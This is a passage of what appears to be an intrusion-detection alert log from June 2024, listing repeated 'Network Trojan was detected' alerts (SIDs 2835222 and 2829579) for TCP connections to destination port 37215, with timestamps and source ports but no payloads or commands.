          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.902161
          SID:2835222
          Source Port:46594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.418934
          SID:2835222
          Source Port:59378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400292
          SID:2835222
          Source Port:41948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037092
          SID:2835222
          Source Port:51940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289594
          SID:2835222
          Source Port:52366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.915102
          SID:2835222
          Source Port:59198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028703
          SID:2835222
          Source Port:46482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.691788
          SID:2829579
          Source Port:42522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397007
          SID:2829579
          Source Port:58854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928853
          SID:2829579
          Source Port:59404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821360
          SID:2835222
          Source Port:44456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206280
          SID:2829579
          Source Port:35062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.653479
          SID:2829579
          Source Port:42824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719159
          SID:2829579
          Source Port:47086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031987
          SID:2835222
          Source Port:36248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478111
          SID:2829579
          Source Port:52678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413638
          SID:2829579
          Source Port:56864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925438
          SID:2829579
          Source Port:58970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396910
          SID:2829579
          Source Port:43006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033105
          SID:2829579
          Source Port:59550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819817
          SID:2829579
          Source Port:32828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398942
          SID:2835222
          Source Port:56550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302495
          SID:2829579
          Source Port:40716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035022
          SID:2829579
          Source Port:60540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476873
          SID:2829579
          Source Port:38164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102539
          SID:2835222
          Source Port:34966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716640
          SID:2835222
          Source Port:42770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945174
          SID:2835222
          Source Port:38776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288881
          SID:2829579
          Source Port:37576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.723949
          SID:2835222
          Source Port:36510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599448
          SID:2835222
          Source Port:33984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720442
          SID:2835222
          Source Port:44690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557667
          SID:2835222
          Source Port:58214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418111
          SID:2835222
          Source Port:49150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.416214
          SID:2835222
          Source Port:43338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867161
          SID:2829579
          Source Port:44672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.298984
          SID:2829579
          Source Port:43946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715098
          SID:2829579
          Source Port:36386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249454
          SID:2835222
          Source Port:34322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718153
          SID:2829579
          Source Port:41966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.902401
          SID:2835222
          Source Port:41860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030725
          SID:2835222
          Source Port:49224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.133421
          SID:2835222
          Source Port:57932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028969
          SID:2829579
          Source Port:46914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.597233
          SID:2829579
          Source Port:59096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.595147
          SID:2835222
          Source Port:57112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.678051
          SID:2835222
          Source Port:41516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538798
          SID:2835222
          Source Port:32968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076235
          SID:2829579
          Source Port:45898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414368
          SID:2829579
          Source Port:34538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248653
          SID:2829579
          Source Port:59208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559497
          SID:2829579
          Source Port:35556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948327
          SID:2835222
          Source Port:40886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249587
          SID:2829579
          Source Port:35496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.902141
          SID:2835222
          Source Port:55516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.937871
          SID:2829579
          Source Port:46494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157132
          SID:2835222
          Source Port:34986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928572
          SID:2829579
          Source Port:59042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822810
          SID:2829579
          Source Port:58646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948351
          SID:2835222
          Source Port:33124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.642885
          SID:2829579
          Source Port:45424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820925
          SID:2835222
          Source Port:43000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719757
          SID:2829579
          Source Port:60694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822368
          SID:2829579
          Source Port:58806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159583
          SID:2829579
          Source Port:56282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246734
          SID:2829579
          Source Port:57140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250471
          SID:2835222
          Source Port:57736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944555
          SID:2835222
          Source Port:47088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.991412
          SID:2835222
          Source Port:35230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719649
          SID:2829579
          Source Port:33786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248641
          SID:2829579
          Source Port:60188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930347
          SID:2829579
          Source Port:48628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.285569
          SID:2835222
          Source Port:57378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165819
          SID:2835222
          Source Port:44592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.712973
          SID:2829579
          Source Port:60730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720649
          SID:2835222
          Source Port:51448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.299737
          SID:2835222
          Source Port:38378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944241
          SID:2829579
          Source Port:42880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606904
          SID:2835222
          Source Port:37074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288207
          SID:2835222
          Source Port:50170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.552422
          SID:2835222
          Source Port:39212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538026
          SID:2829579
          Source Port:58830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645288
          SID:2835222
          Source Port:56082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714295
          SID:2835222
          Source Port:39824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230432
          SID:2829579
          Source Port:53060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418037
          SID:2829579
          Source Port:34250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643433
          SID:2829579
          Source Port:59070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.924639
          SID:2829579
          Source Port:34190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164121
          SID:2835222
          Source Port:55920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822098
          SID:2835222
          Source Port:53682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246744
          SID:2829579
          Source Port:44478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869709
          SID:2829579
          Source Port:60108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.561990
          SID:2835222
          Source Port:50724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.919528
          SID:2829579
          Source Port:48698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.101948
          SID:2835222
          Source Port:57520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.252988
          SID:2835222
          Source Port:37446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.275923
          SID:2835222
          Source Port:53584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914354
          SID:2829579
          Source Port:46916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415434
          SID:2829579
          Source Port:48280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.989954
          SID:2835222
          Source Port:39854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945775
          SID:2835222
          Source Port:36316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.278784
          SID:2835222
          Source Port:42980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.917004
          SID:2829579
          Source Port:53728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567496
          SID:2835222
          Source Port:46154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.892932
          SID:2829579
          Source Port:55250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563563
          SID:2829579
          Source Port:42778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865125
          SID:2829579
          Source Port:60952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247373
          SID:2835222
          Source Port:49582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922005
          SID:2835222
          Source Port:44040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928059
          SID:2835222
          Source Port:40834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928536
          SID:2829579
          Source Port:33218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081183
          SID:2835222
          Source Port:53172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.924582
          SID:2829579
          Source Port:38150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988446
          SID:2829579
          Source Port:59472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945792
          SID:2835222
          Source Port:52498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596113
          SID:2829579
          Source Port:41368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596228
          SID:2835222
          Source Port:49148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.283619
          SID:2829579
          Source Port:45406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.131888
          SID:2829579
          Source Port:60750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415793
          SID:2835222
          Source Port:45338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.632691
          SID:2835222
          Source Port:58370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987798
          SID:2829579
          Source Port:54946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568308
          SID:2835222
          Source Port:37730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928128
          SID:2829579
          Source Port:42822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274450
          SID:2835222
          Source Port:41908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.697770
          SID:2835222
          Source Port:60230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566065
          SID:2829579
          Source Port:49436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989389
          SID:2835222
          Source Port:42108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230199
          SID:2829579
          Source Port:38032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.687321
          SID:2829579
          Source Port:40208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205596
          SID:2829579
          Source Port:37650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206288
          SID:2829579
          Source Port:42274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718434
          SID:2835222
          Source Port:52376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862068
          SID:2835222
          Source Port:55244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718588
          SID:2835222
          Source Port:38672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475935
          SID:2835222
          Source Port:58312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036779
          SID:2835222
          Source Port:33858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.909280
          SID:2835222
          Source Port:47436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643709
          SID:2835222
          Source Port:50900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.274921
          SID:2835222
          Source Port:53696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945612
          SID:2835222
          Source Port:35464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.252609
          SID:2835222
          Source Port:60242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.207695
          SID:2829579
          Source Port:45918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720760
          SID:2835222
          Source Port:58762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928639
          SID:2829579
          Source Port:40418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865035
          SID:2835222
          Source Port:48186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.893885
          SID:2835222
          Source Port:34328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713839
          SID:2829579
          Source Port:49962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.924706
          SID:2829579
          Source Port:47742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206364
          SID:2829579
          Source Port:50184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.156856
          SID:2829579
          Source Port:37528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.601949
          SID:2829579
          Source Port:34500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288228
          SID:2835222
          Source Port:46208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718816
          SID:2835222
          Source Port:45962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030609
          SID:2835222
          Source Port:59164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645010
          SID:2835222
          Source Port:59018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821869
          SID:2835222
          Source Port:57178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865106
          SID:2829579
          Source Port:52782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720287
          SID:2829579
          Source Port:36548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.661016
          SID:2835222
          Source Port:39080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.632050
          SID:2835222
          Source Port:49268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289714
          SID:2835222
          Source Port:45184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559756
          SID:2835222
          Source Port:50740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230564
          SID:2835222
          Source Port:59990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031721
          SID:2835222
          Source Port:43728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606985
          SID:2835222
          Source Port:36990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161401
          SID:2829579
          Source Port:41754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.693954
          SID:2829579
          Source Port:52614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719258
          SID:2829579
          Source Port:35972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205480
          SID:2835222
          Source Port:52584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159610
          SID:2835222
          Source Port:60880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397855
          SID:2829579
          Source Port:56524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914018
          SID:2835222
          Source Port:48770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.951584
          SID:2835222
          Source Port:52284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399299
          SID:2829579
          Source Port:43770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103027
          SID:2829579
          Source Port:46332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.298409
          SID:2835222
          Source Port:33610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865246
          SID:2829579
          Source Port:44110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.411988
          SID:2829579
          Source Port:33294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822193
          SID:2829579
          Source Port:42100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946028
          SID:2829579
          Source Port:55894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.207012
          SID:2829579
          Source Port:44970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.207483
          SID:2835222
          Source Port:48164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476821
          SID:2829579
          Source Port:37412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.473795
          SID:2835222
          Source Port:60162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.130797
          SID:2835222
          Source Port:44960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250852
          SID:2829579
          Source Port:59090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164220
          SID:2835222
          Source Port:52092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923148
          SID:2829579
          Source Port:40168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030632
          SID:2829579
          Source Port:47682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719993
          SID:2835222
          Source Port:57280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.018074
          SID:2835222
          Source Port:59556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224277
          SID:2835222
          Source Port:58078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030334
          SID:2829579
          Source Port:46576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.130630
          SID:2835222
          Source Port:50082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.418193
          SID:2829579
          Source Port:32896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469679
          SID:2829579
          Source Port:53996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
